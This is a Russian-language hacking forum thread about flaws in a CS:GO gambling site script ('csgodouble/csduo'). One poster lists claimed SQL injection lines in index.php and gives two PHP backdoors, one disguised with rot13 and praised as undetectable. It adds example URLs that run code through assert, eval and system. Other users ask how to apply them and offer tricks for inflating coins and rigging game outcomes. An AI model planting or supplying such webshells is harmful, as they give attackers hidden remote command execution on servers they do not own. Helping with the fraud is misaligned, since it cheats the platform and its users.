• Данный материал предоставлен сайтом исключительно в ознакомительных целях.
    Администрация не несет ответственности за его содержимое. По всем жалобам пишите на почту abusevhguru@yandex.ru

Уязвимости в csgodouble csduo топ!!!

Lar1k

Капитан
Сообщения
260
Реакции
62

Lar1k

  • 260
  • 62
Обратите внимание, пользователь заблокирован. Крайне не рекомендуем заключать сделки с этим пользователем,
1) /index.php 18: $sql = $db->query("SELECT * FROM `users` WHERE `hash` = " . $db->quote( $_COOKIE['hash'])); SQL Injection
2) /index.php 351: $sql = $db->query('SELECT * FROM `trades` WHERE `id` = '.$db->quote( $_COOKIE['tid']).' AND `status` = 0'); SQL Injection
3) /index.php 395: $sql = $db->query('SELECT * FROM `trades` WHERE `id` = '.$db->quote( $_COOKIE['tid']).' AND `status` = 0'); SQL Injection
Уязвимые места index.php
Если нужно буде выложу больше

1) PHP-Backdoor, который ничем не палится и при этом выглядит не палевно
Код:
<?php
@$_REQUEST['large'](str_rot13('riny($_ERDHRFG["pbqr"]);'));
?>
Код:
index.php?large=assert&code=echo 123;
index.php?large=assert&code=system('echo 1;');
2) PHP-Backdoor, спасибо тебе, типизация которой нет
Код:
<?php $_REQUEST['f']($_REQUEST['c']); ?>
Код:
index.php?f=assert&c=phpinfo();
index.php?f=eval&c=echo 1;
 
Последнее редактирование:

ToXaHo

Заблокирован
Сообщения
589
Реакции
420

ToXaHo

  • 589
  • 420
1) /index.php 18: $sql = $db->query("SELECT * FROM `users` WHERE `hash` = " . $db->quote( $_COOKIE['hash'])); SQL Injection
2) /index.php 351: $sql = $db->query('SELECT * FROM `trades` WHERE `id` = '.$db->quote( $_COOKIE['tid']).' AND `status` = 0'); SQL Injection
3) /index.php 395: $sql = $db->query('SELECT * FROM `trades` WHERE `id` = '.$db->quote( $_COOKIE['tid']).' AND `status` = 0'); SQL Injection
Уязвимые места index.php
Если нужно буде выложу больше
типо куки заменить?
 

leon808

Новичок
Сообщения
8
Реакции
2

leon808

  • 8
  • 2
Парни, я задолбался все фиксить. Уже около недели выкиньте вы этот скрипт на помойку. Если лойсов много будет скину какнуть на накрутку коинов, так сказать по горячим следам откопал. Мб кому поможет

P.s. На подкрутку цвета тоже имеется
 
Последнее редактирование:

Lar1k

Капитан
Сообщения
260
Реакции
62

Lar1k

  • 260
  • 62
Обратите внимание, пользователь заблокирован. Крайне не рекомендуем заключать сделки с этим пользователем,
Парни, я задолбался все фиксить. Уже около недели выкиньте вы этот скрипт на помойку. Если лойсов много будет скину какнуть на накрутку коинов, так сказать по горячим следам откопал. Мб кому поможет

P.s. На подкрутку цвета тоже имеется
Сливай, позже фиксы закину
 

Lar1k

Капитан
Сообщения
260
Реакции
62

Lar1k

  • 260
  • 62
Обратите внимание, пользователь заблокирован. Крайне не рекомендуем заключать сделки с этим пользователем,

Misha2184

Пользователь
Сообщения
56
Реакции
4

Misha2184

  • 56
  • 4
1) /index.php 18: $sql = $db->query("SELECT * FROM `users` WHERE `hash` = " . $db->quote( $_COOKIE['hash'])); SQL Injection
2) /index.php 351: $sql = $db->query('SELECT * FROM `trades` WHERE `id` = '.$db->quote( $_COOKIE['tid']).' AND `status` = 0'); SQL Injection
3) /index.php 395: $sql = $db->query('SELECT * FROM `trades` WHERE `id` = '.$db->quote( $_COOKIE['tid']).' AND `status` = 0'); SQL Injection
Уязвимые места index.php
Если нужно буде выложу больше
А нужно в адресную строку вставлять? и что они делают?
 

Lar1k

Капитан
Сообщения
260
Реакции
62

Lar1k

  • 260
  • 62
Обратите внимание, пользователь заблокирован. Крайне не рекомендуем заключать сделки с этим пользователем,
14, и возможно еще в боте
 
Сверху